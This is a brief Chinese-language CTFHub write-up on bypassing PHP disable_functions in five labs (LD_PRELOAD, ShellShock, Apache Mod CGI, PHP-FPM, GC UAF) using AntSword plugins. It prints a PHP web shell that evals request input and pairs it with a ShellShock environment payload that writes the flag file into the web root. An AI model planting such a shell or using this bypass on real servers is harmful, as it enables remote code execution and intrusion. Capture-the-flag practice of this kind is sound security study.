ctfhub Bypass disable_function

fasewer2024-08-07 18:42

LD_PRELOAD

url

蚁剑连接

选择插件

点击开始

查看到此文件名编辑连接拼接到url后面重新连接

点击开启终端

在终端执行命令

复制代码 
ls /
/readfile

ShellShock

url

CTFHub 环境实例 | 提示信息

蚁剑连接

写入shell.php

复制代码 
<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

使用插件

终端执行命令得到flag

Apache Mod CGI

查看GetFlag

蚁剑连接

直接使用工具

终端执行命令

PHP-FPM

蚁剑连接

工具连接

拼接地址

在终端执行命令

GC UAF

蚁剑连接

使用工具

在终端执行命令

相关推荐
xiangpanf10 分钟前
Laravel 10.x重磅升级:五大核心特性解析
android
weixin_426689201 小时前
vscode C语言编译环境搭建(单个文件)
c语言·ide·vscode
robotx3 小时前
安卓线程相关
android
消失的旧时光-19433 小时前
Android 面试高频:JSON 文件、大数据存储与断电安全(从原理到工程实践)
android·面试·json
dalancon4 小时前
VSYNC 信号流程分析 (Android 14)
android
dalancon5 小时前
VSYNC 信号完整流程2
android
dalancon5 小时前
SurfaceFlinger 上帧后 releaseBuffer 完整流程分析
android
用户69371750013846 小时前
不卷AI速度,我卷自己的从容——北京程序员手记
android·前端·人工智能
程序员Android6 小时前
Android 刷新一帧流程trace拆解
android
墨狂之逸才7 小时前
解决 Android/Gradle 编译报错:Comparison method violates its general contract!
android
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06OpenClaw 使用和管理 MCP 完全指南07UV安装并设置国内源08AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南09OpenClaw Control UI安全上下文访问配置10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)